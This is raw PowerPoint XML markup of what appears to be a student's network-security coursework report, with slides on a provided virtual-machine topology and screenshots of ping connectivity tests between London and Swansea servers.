            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE92DA3A-A35D-E1AC-1F9D-A6C94270164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5F2266-DAF6-7ECE-3003-1AB2F0E503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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88EA1513-B8AF-203A-8E37-B42FF9CD1A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ABF797-BF28-2147-EEEF-0BF63937CE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7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF4A200-EEFC-5CF7-3A63-E059CBA58A58}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF75D13-ABB0-33ED-93BF-B109356D2700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0EAA084-D707-2C08-CC15-27596CA67233}"/>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190892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21D38-96DA-722C-4A23-DA64689731AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D0D74E-BB44-8F83-3C15-E64A6C26D4B5}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E50ED0D-6B96-5182-6C65-212D19C03722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C0A58F0-DE0A-5ABD-5672-43ED1439A978}"/>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1400504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8AE67C-C365-666E-59BE-009B39E6A0F0}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A7FCE9-C0BE-22AE-4796-09F7F86E8327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B6D1F2-B0BF-4596-2069-C798053D4A02}"/>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2953069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D858A-8FA1-2214-D472-383C028E66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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B71D71-62A1-9D94-8ABE-AC62013A7A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Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BB78AA-E52E-A260-259C-57828E8521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B0D4A7-B63D-A585-18FE-2FF5E0AF8C70}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0080A22-079E-546C-88C3-28F6C46D35D5}"/>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2BC600F8-B15B-D0F9-E156-8E287FB38F7D}"/>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451850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D2071-983C-E863-2400-69AE07880B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Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D239C247-540E-60BE-B169-09317158F3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Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAE9425-EE86-FEDE-3213-68A5FA301A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0C04C3-5BBF-8628-2F8F-37D82DC4C1AB}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E4A9CC-0B99-23AA-A8A5-F6CBDCB40447}"/>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EBF22EE1-7C68-858C-9212-B7B5DDFB0FF0}"/>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3399542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2C650-CAD5-3ABF-5DEA-F8B34B878A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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4595887A-BEB4-41B9-D13F-24B6AC5E53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22A680FF-0613-A8CB-2889-27CE328A66ED}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96267AC9-292F-B42C-CEC6-B78AD1863929}"/>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CF5D1893-541B-8411-A96F-020B9972EC86}"/>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26666743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3C4A35-B775-16A6-1A66-470082E547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4015960E-6D40-9356-F526-13C9BA6B2F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320FCEBD-D64E-6D74-8F1F-D9DB91CB79C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D3DB71CC-D1DC-4F62-8BFD-89364E14ECB7}" type="datetimeFigureOut">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>3.11.2025 г.</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C663D0E-7233-71BB-FD00-8BE82C566C11}"/>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D89B210A-B5F7-0743-0486-BA4877B74FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12796C9-4109-4DF6-BF92-E12D7B19270A}" type="slidenum">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3122351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8B032A-19DF-E59D-24FF-00151D43E7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bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21DA6F5A-F4B0-195F-E0C2-561C0D47C8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B15D534E-9975-6B55-14E5-F159D6C069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DB71CC-D1DC-4F62-8BFD-89364E14ECB7}" type="datetimeFigureOut">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>3.11.2025 г.</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F7FFA3-4628-7600-E270-368F3F4ABF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bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D96061A-16D4-4F34-4162-8236E475DE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12796C9-4109-4DF6-BF92-E12D7B19270A}" type="slidenum">
              <a:rPr lang="bg-BG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7898053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57FCF1-48D1-3491-59CF-D569761258FC}"/>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sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Report</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Evgeni Manov</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>(2314194)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1329164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AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2166E42F-00E3-1FF2-933B-EE84098855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675" y="1573908"/>
            <a:ext cx="6589537" cy="3706615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Triangle 1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742E384-EA5B-4259-56CF-BD19272F0E71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052497" y="1056640"/>
            <a:ext cx="3197660" cy="3125746"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" b="1" u="sng" dirty="0"/>
              <a:t>Task 1: Brief</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" b="1" u="sng" dirty="0"/>
              <a:t>Secure and Demonstrate the given Network</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB47540-0723-FD4F-71B2-47185566EEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10758115" y="5018554"/>
            <a:ext cx="45719" cy="45719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="bg-BG" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C54BEE-3744-73C7-BC6C-F53E64AFCF97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869809166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="125280" y="6350847"/>
          <a:ext cx="8128000" cy="91440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1192173880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5035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this slide you can see provided topology such as  .OVA file. Everything is installed.</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="783588835"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4169844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5" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428AC11-BFDF-42EF-80FF-717BBF909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8628" y="1408629"/>
            <a:ext cx="6858000"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CC56AF6-38E4-490B-8E2B-1A1037B4E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832"/>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339A6F5-AD6A-4D80-8AD9-6290D13AC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513"/>
            <a:ext cx="6857572" cy="3581401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="000000">
                  <a:alpha val="61000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="95000">
                <a:schemeClr val="accent5">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483B23-7F46-1824-CDB0-44A3BE6B7AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660042" y="2945176"/>
            <a:ext cx="2878688" cy="2757975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshots of connectivity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer screen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6619ED-6C7F-9E6C-FD32-958E6B9EB4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75217" y="2547595"/>
            <a:ext cx="3147413" cy="1762551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer screen shot of a computer screen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9460A6CC-8F3A-09F1-7F21-EEB677F08EC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6414" y="2545321"/>
            <a:ext cx="3141973" cy="1767360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66AD1692-0419-43C8-5492-4EF1BD0C3D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="638750963"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038603" y="5213233"/>
          <a:ext cx="8128001" cy="64008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514565153"/>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On this slide you can see connectivity between machines.</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" sz="1800" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1173315693"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602405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035B7-F17B-6B6E-0B8B-DB68E1550A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662180" y="2862471"/>
            <a:ext cx="3041803" cy="2907802"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping the machines L-CD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBAB3D56-263D-5895-1BEF-DAAA0EBAC2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1040" y="1259855"/>
            <a:ext cx="3387578" cy="1913981"/>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97FD1963-5013-14E2-5B8E-A50CBFF35F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3930" y="1250348"/>
            <a:ext cx="3419533" cy="1923487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B4B2FC-3479-4E76-FD52-76B64EF86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90617" y="3429000"/>
            <a:ext cx="5133269" cy="2887465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483463CB-A311-7A3A-CE60-CF11ECF6A101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1660629645"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-25398" y="-115648"/>
          <a:ext cx="8128001" cy="118872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2443927391"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="9723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this slide you can see ping commands from London server to Swansea server. Everything is successfully exceptional connectivity with IP 192.168.2.10 due to technical problem with provided topology.</a:t>
                      </a:r>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="bg-BG" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2144282699"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86963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7F1AF47-AE98-4034-BD91-1976FA4D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EC0EE2B-2029-48DD-893D-F528E651B0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5AE1D08-1ED1-4F59-B42F-4D8EA33DC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9A79B912-88EA-4640-BDEB-51B3B11A0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F9979-9C0F-81E2-13E0-23A789773C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662180" y="2862471"/>
            <a:ext cx="3041803" cy="2907802"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping the machines S-DC1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a black screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42636659-44FF-A14B-C80B-B3D4F14252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1040" y="1268323"/>
            <a:ext cx="3387578" cy="1905513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
